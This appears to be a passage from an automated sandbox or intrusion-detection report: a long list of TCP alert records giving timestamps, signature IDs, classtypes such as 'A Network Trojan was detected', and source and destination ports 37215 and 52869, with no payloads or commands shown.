                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.633744
                      SID:2835222
                      Source Port:34962
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.067695
                      SID:2831300
                      Source Port:38648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.007374
                      SID:2027339
                      Source Port:36010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:27.457367
                      SID:2025132
                      Source Port:59154
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.115230
                      SID:2831300
                      Source Port:55048
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.145997
                      SID:2027339
                      Source Port:60476
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.825430
                      SID:2027339
                      Source Port:41712
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:09.081648
                      SID:2027339
                      Source Port:40564
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.704900
                      SID:2831300
                      Source Port:53568
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:52.487978
                      SID:2831300
                      Source Port:40330
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.127340
                      SID:2829579
                      Source Port:50410
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:08.291319
                      SID:2027339
                      Source Port:41704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.864479
                      SID:2025132
                      Source Port:57882
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:06.884162
                      SID:2027339
                      Source Port:41536
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.032369
                      SID:2831300
                      Source Port:56572
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.132103
                      SID:2829579
                      Source Port:49684
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.474436
                      SID:2831300
                      Source Port:41066
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.357440
                      SID:2027339
                      Source Port:43918
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.154068
                      SID:2835222
                      Source Port:43252
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.614193
                      SID:2831300
                      Source Port:40086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:12.806645
                      SID:2027339
                      Source Port:40080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.515977
                      SID:2027339
                      Source Port:55936
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.472685
                      SID:2027339
                      Source Port:58500
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.876750
                      SID:2835222
                      Source Port:36186
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:13.289823
                      SID:2025132
                      Source Port:34358
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:25.200191
                      SID:2027339
                      Source Port:57584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.145997
                      SID:2025132
                      Source Port:34796
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:50.202477
                      SID:2027339
                      Source Port:52778
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.943244
                      SID:2835222
                      Source Port:57416
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.294677
                      SID:2835222
                      Source Port:43814
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.870961
                      SID:2025132
                      Source Port:34216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.818739
                      SID:2025132
                      Source Port:44594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:48.447183
                      SID:2027339
                      Source Port:37874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.090830
                      SID:2835222
                      Source Port:51692
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.992285
                      SID:2025132
                      Source Port:47032
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:00.633744
                      SID:2835222
                      Source Port:57288
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.806839
                      SID:2027339
                      Source Port:53204
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.104572
                      SID:2829579
                      Source Port:44332
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.924344
                      SID:2025132
                      Source Port:40650
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.331748
                      SID:2027339
                      Source Port:40186
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.645051
                      SID:2835222
                      Source Port:42956
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.197215
                      SID:2027339
                      Source Port:59982
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.636533
                      SID:2835222
                      Source Port:41368
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.588824
                      SID:2831300
                      Source Port:33420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:48.958887
                      SID:2027339
                      Source Port:43122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.562013
                      SID:2831300
                      Source Port:54784
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.023857
                      SID:2831300
                      Source Port:42610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.050503
                      SID:2835222
                      Source Port:38012
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.349275
                      SID:2835222
                      Source Port:40914
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.142024
                      SID:2831300
                      Source Port:57768
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.858878
                      SID:2831300
                      Source Port:58408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.154067
                      SID:2829579
                      Source Port:59582
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.974551
                      SID:2829579
                      Source Port:49040
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.389908
                      SID:2025132
                      Source Port:48504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.751824
                      SID:2027339
                      Source Port:37240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.602356
                      SID:2027339
                      Source Port:44534
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.081923
                      SID:2027339
                      Source Port:50626
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.584506
                      SID:2027339
                      Source Port:42566
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.078068
                      SID:2025132
                      Source Port:46562
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.877747
                      SID:2835222
                      Source Port:52436
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.321505
                      SID:2025132
                      Source Port:49492
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.971627
                      SID:2027339
                      Source Port:56016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.172994
                      SID:2025132
                      Source Port:39872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.144153
                      SID:2025132
                      Source Port:47330
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:50.332163
                      SID:2027339
                      Source Port:49330
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.632446
                      SID:2831300
                      Source Port:50766
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.839991
                      SID:2025132
                      Source Port:38688
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.399678
                      SID:2027339
                      Source Port:44296
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:11.752225
                      SID:2025132
                      Source Port:48318
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.859927
                      SID:2027339
                      Source Port:53216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.290838
                      SID:2025132
                      Source Port:52896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:10.513310
                      SID:2027339
                      Source Port:46946
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.762774
                      SID:2027339
                      Source Port:57830
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.674122
                      SID:2027339
                      Source Port:47054
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.325694
                      SID:2831300
                      Source Port:40842
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:51.949637
                      SID:2831300
                      Source Port:35496
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.841155
                      SID:2831300
                      Source Port:49646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.486106
                      SID:2025132
                      Source Port:54728
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.110964
                      SID:2027339
                      Source Port:40600
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.650243
                      SID:2835222
                      Source Port:58838
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.117066
                      SID:2829579
                      Source Port:55386
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221803
                      SID:2835222
                      Source Port:53230
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.416206
                      SID:2027339
                      Source Port:59336
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.357099
                      SID:2831300
                      Source Port:53504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:25.766611
                      SID:2025132
                      Source Port:51032
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.629036
                      SID:2027339
                      Source Port:45276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.980258
                      SID:2027339
                      Source Port:32840
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.046177
                      SID:2027339
                      Source Port:52732
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.916250
                      SID:2835222
                      Source Port:60820
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.096752
                      SID:2835222
                      Source Port:45326
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.452336
                      SID:2027339
                      Source Port:39466
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.540121
                      SID:2027339
                      Source Port:60856
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.620479
                      SID:2027339
                      Source Port:39684
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.331150
                      SID:2829579
                      Source Port:44664
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.331150
                      SID:2829579
                      Source Port:49640
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.893677
                      SID:2025132
                      Source Port:34106
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.599834
                      SID:2831300
                      Source Port:48136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:57.223887
                      SID:2829579
                      Source Port:41330
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.638418
                      SID:2835222
                      Source Port:59370
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:09.030401
                      SID:2831300
                      Source Port:33440
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:12.807274
                      SID:2831300
                      Source Port:37612
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:52.393089
                      SID:2027339
                      Source Port:58436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:06.131728
                      SID:2025132
                      Source Port:59882
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.512162
                      SID:2027339
                      Source Port:48972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.653586
                      SID:2835222
                      Source Port:36930
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.659105
                      SID:2831300
                      Source Port:36324
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:49.033216
                      SID:2027339
                      Source Port:59516
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:48.156942
                      SID:2025132
                      Source Port:35430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.786751
                      SID:2027339
                      Source Port:55894
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.072139
                      SID:2027339
                      Source Port:45316
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.483105
                      SID:2027339
                      Source Port:49882
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.591862
                      SID:2831300
                      Source Port:56994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:00.634165
                      SID:2835222
                      Source Port:60608
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.592140
                      SID:2027339
                      Source Port:36644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.699478
                      SID:2025132
                      Source Port:37526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.131607
                      SID:2027339
                      Source Port:33750
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.484578
                      SID:2025132
                      Source Port:58038
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.844694
                      SID:2025132
                      Source Port:51090
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.285244
                      SID:2831300
                      Source Port:55514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.188768
                      SID:2025132
                      Source Port:52494
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:08.008782
                      SID:2025132
                      Source Port:36758
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:34.045749
                      SID:2835222
                      Source Port:48766
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.551511
                      SID:2027339
                      Source Port:33580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.132103
                      SID:2829579
                      Source Port:33446
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.909434
                      SID:2027339
                      Source Port:46270
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.325400
                      SID:2831300
                      Source Port:38942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.117484
                      SID:2027339
                      Source Port:48780
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.991829
                      SID:2027339
                      Source Port:58460
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.517399
                      SID:2027339
                      Source Port:50900
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.688478
                      SID:2025132
                      Source Port:60970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.055683
                      SID:2829579
                      Source Port:45562
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.118060
                      SID:2831300
                      Source Port:49154
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:14.113390
                      SID:2829579
                      Source Port:47014
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.683789
                      SID:2027339
                      Source Port:34530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.599833
                      SID:2025132
                      Source Port:48540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.311969
                      SID:2831300
                      Source Port:44292
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:56.510714
                      SID:2831300
                      Source Port:40700
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.127340
                      SID:2829579
                      Source Port:40570
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.559170
                      SID:2027339
                      Source Port:51992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.870904
                      SID:2027339
                      Source Port:46610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:09.817737
                      SID:2027339
                      Source Port:52942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.504220
                      SID:2027339
                      Source Port:45026
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.180913
                      SID:2025132
                      Source Port:53382
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.320408
                      SID:2829579
                      Source Port:48886
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.329746
                      SID:2831300
                      Source Port:53542
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.944299
                      SID:2829579
                      Source Port:37398
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.929013
                      SID:2835222
                      Source Port:53856
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.969609
                      SID:2027339
                      Source Port:41896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.175676
                      SID:2025132
                      Source Port:59638
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.883171
                      SID:2835222
                      Source Port:46870
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.672544
                      SID:2027339
                      Source Port:34852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.895849
                      SID:2025132
                      Source Port:35128
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.291616
                      SID:2829579
                      Source Port:41636
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.259813
                      SID:2027339
                      Source Port:40310
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.979752
                      SID:2835222
                      Source Port:45060
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.324877
                      SID:2027339
                      Source Port:55470
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.976649
                      SID:2835222
                      Source Port:59476
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.124696
                      SID:2829579
                      Source Port:39104
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.901420
                      SID:2831300
                      Source Port:44428
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:27.651332
                      SID:2829579
                      Source Port:52286
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.280308
                      SID:2831300
                      Source Port:55862
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:51.266338
                      SID:2027339
                      Source Port:44988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.569791
                      SID:2831300
                      Source Port:51988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.227281
                      SID:2027339
                      Source Port:59816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.089079
                      SID:2027339
                      Source Port:46226
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.919725
                      SID:2027339
                      Source Port:46758
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.574948
                      SID:2831300
                      Source Port:39120
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.149832
                      SID:2027339
                      Source Port:41576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.454456
                      SID:2027339
                      Source Port:56898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.114673
                      SID:2829579
                      Source Port:57736
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221220
                      SID:2835222
                      Source Port:58196
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.749737
                      SID:2835222
                      Source Port:48384
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.943544
                      SID:2835222
                      Source Port:52986
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.433470
                      SID:2831300
                      Source Port:40136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.057729
                      SID:2835222
                      Source Port:51132
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.923127
                      SID:2027339
                      Source Port:46216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.155894
                      SID:2027339
                      Source Port:43802
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.121284
                      SID:2025132
                      Source Port:40112
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.095767
                      SID:2025132
                      Source Port:42164
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:04.748522
                      SID:2025132
                      Source Port:47778
                      Destination Port:52869
